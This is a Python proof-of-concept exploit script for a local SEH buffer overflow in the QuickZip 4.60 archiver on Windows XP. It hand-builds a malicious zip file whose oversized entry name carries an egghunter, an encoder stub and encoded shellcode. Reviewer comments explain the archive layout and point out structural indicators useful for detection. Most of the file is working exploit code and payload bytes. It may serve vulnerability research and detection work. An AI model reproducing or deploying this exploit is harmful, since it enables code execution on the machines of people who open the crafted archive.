  1    #!/usr/bin/python
  2    #
  3    # ###############################################################################
  4    # Exploit Title : QuickZip 4.x (.zip) 0day Local Universal Buffer Overflow PoC Exploit
  5    # Date          : 9/3/2010
  6    # Author        : corelanc0d3r & mr_me
  7    # Bug found by : corelanc0d3r (http://corelan.be:8800/)
  8    # Software Link : http://www.quickzip.org/downloads.html
  9    # Version       : 4.60
  10   # OS            : Windows
  11   # Tested on     : XP SP3 En
  12   # Type of vuln : SEH
  13   # Greetz to     : Corelan Security Team
  14   # http://www.corelan.be:8800/index.php/security/corelan-team-members/
  15   # ###############################################################################
  16   # Script provided 'as is', without any warranty.
  17   # Use for educational purposes only.
  18   # Do not use this code to do anything illegal !
  19   #
  20   # Note : you are not allowed to edit/modify this code.
  21   # If you do, Corelan cannot be held responsible for any damages this may cause.
  22   #
  23   # how does this work?
  24   # http://www.offensive-security.com/blog/vulndev/quickzip-stack-bof-0day-a-box-of-chocolates/
  25
  # Banner output only (Python 2 print statements); nothing below depends on it.
  26   print   "|−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−|"
  27   print   "|                   __             __                 |"
  28   print   "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"
  29   print   "| / ___/ __ \/ ___/ _ \/ / __ ‘/ __ \ / __/ _ \/ __ ‘/ __ ‘__ \ |"
  30   print   "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"
  31   print   "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |"
  32   print   "|                                                  |"
  33   print   "|                              http://www.corelan.be:8800 |"
  34   print   "|                                    security@corelan.be |"
  35   print   "|                                                  |"
  36   print   "|−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−[ EIP Hunters ]−−|"
  37   print   "[+] QuickZip 4.x (.zip) 0day Local Universal Buffer Overflow PoC Exploit"
  38
  # Minimal hand-built zip container: a 30-byte local file header (PK\x03\x04),
  # a 46-byte central directory header (PK\x01\x02) and a 22-byte end-of-central-
  # directory record (PK\x05\x06). Every size/offset field is hard-coded for
  # exactly one entry whose name is 4068 bytes long (name-length field
  # \xe4\x0f = 0x0fe4), which is what the "lol" string below is padded to.
  #
  # Detection note: a 4068-byte entry name together with zero CRC and zero
  # compressed/uncompressed sizes is far outside what an ordinary archiver
  # emits, so the structure itself is a usable indicator for this PoC.
  #
  # Local file header: CRC/sizes = 0, name length = 4068, extra length = 0.
  39   header_1 = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
  40   "\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00")
  41
  # Central directory header: same 4068-byte name length, local-header offset 0.
  42   header_2 = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
  43   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00"
  44   "\x24\x00\x00\x00\x00\x00\x00\x00")
  45
  # End of central directory: 1 entry, directory size 0x1012 (= 46 + 4068),
  # directory offset 0x1002 (= 30 + 4068), no archive comment.
  46   header_3 = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
  47   "\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00")
  48
  49   # pure ascii egghunter, thanks to skylined
  # Stored here as an opaque printable-ASCII string.
  # NOTE(review): presumably searches for the "W00TW00T" marker that is placed
  # in front of "calc" further down; not verifiable from the encoded bytes.
  50   egghunter= ("JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIQvK1"
  51   "9ZKO6orbv2bJgr2xZmtnulfePZPthoOHbwFPtpbtLKkJLo1eJJloPuKW9okWA");
  52

  # Encoded payload appended after the "W00TW00T" marker below. The name
  # suggests a calc.exe launcher; the bytes are opaque here, so nothing more
  # is asserted about what they do.
  53    calc = ("\xd9\xf7\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49"
  54    "\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
  55    "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
  56    "\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
  57    "\x4c\x4a\x48\x51\x54\x45\x50\x43\x30\x45\x50\x4c\x4b\x51\x55"
  58    "\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x43\x31\x4a\x4f\x4c"
  59    "\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a\x4b"
  60    "\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49"
  61    "\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x42\x54\x44\x47\x49\x51"
  62    "\x49\x5a\x44\x4d\x45\x51\x49\x52\x4a\x4b\x4b\x44\x47\x4b\x50"
  63    "\x54\x47\x54\x45\x54\x44\x35\x4d\x35\x4c\x4b\x51\x4f\x51\x34"
  64    "\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51"
  65    "\x4f\x45\x4c\x43\x31\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x43\x31"
  66    "\x4a\x4b\x4c\x49\x51\x4c\x46\x44\x43\x34\x48\x43\x51\x4f\x50"
  67    "\x31\x4a\x56\x43\x50\x50\x56\x42\x44\x4c\x4b\x50\x46\x50\x30"
  68    "\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c"
  69    "\x4b\x42\x48\x45\x58\x4b\x39\x4a\x58\x4b\x33\x49\x50\x42\x4a"
  70    "\x50\x50\x42\x48\x4c\x30\x4c\x4a\x44\x44\x51\x4f\x45\x38\x4a"
  71    "\x38\x4b\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43"
  72    "\x45\x31\x42\x4c\x43\x53\x46\x4e\x43\x55\x43\x48\x45\x35\x45"
  73    "\x50\x41\x41");
  74
  75    # custom encoder
  # Opaque byte string; the name indicates a small decoder stub placed in
  # front of the egghunter marker. Its exact effect is not verified here.
  76    encoder = ("\x25\x4A\x4D\x4E\x55"
  77    "\x25\x35\x32\x31\x2A"
  78    "\x2d\x55\x55\x55\x5f"
  79    "\x2d\x56\x55\x56\x5f"
  80    "\x2d\x55\x55\x55\x5e"
  81    "\x50"
  82    "\x25\x4A\x4D\x4E\x55"
  83    "\x25\x35\x32\x31\x2A"
  84    "\x2d\x2b\x6a\x32\x53"
  85    "\x2d\x2a\x6a\x31\x54"
  86    "\x2d\x2a\x69\x31\x54"
  87    "\x50"
  88    );
  89
  90    print "[+] Building PoC.."
  91
  # Build the entry name. It is grown to 4064 bytes here (4068 once ".txt"
  # is appended below). Each '"\x41" * (N - len(lol))' step pads to a fixed
  # absolute offset (223, 294, 4064), so every piece that follows lands at a
  # fixed position inside the name regardless of the preceding pieces' sizes.
  #
  # Detection note: the name mixes non-printable bytes (including \x00) with
  # the ASCII marker "W00TW00T"; genuine zip entry names are short and printable.
  92    lol   = "\x43" * 20
  93    lol   += egghunter
  94    lol   += "\x41" * (223−len(lol))
  95    lol   += "\x61"
  96    lol   += "\x53"
  97    lol   += "\x5c"
  98    lol   += encoder
  99    lol   += "\x41" * (294−len(lol))
  100   lol   += "\x73\xf9\x41\x41"
  101   lol   += "\x5c\x53\x46\x00"
  102   lol   += "W00TW00T"
  103   lol   += calc
  104   lol   += "\x42" * (4064−len(lol))
  # Final name length: 4064 + 4 = 4068 bytes, the value declared in the
  # name-length fields of header_1 and header_2.
  105   lol += ".txt"
  106
  # Archive layout: local header + name, central directory header + name,
  # end-of-central-directory record. The oversized name is written twice
  # because the directory size/offset fields in header_3 account for both.
  107   exploit = header_1 + lol + header_2 + lol + header_3
  108
  # Writes cst.zip into the current working directory; the file is closed
  # explicitly rather than via a 'with' block.
  109   mefile = open(’cst.zip’,’w’);
  110   mefile.write(exploit);
  111   mefile.close()
  112   print "[+] Exploit complete!"



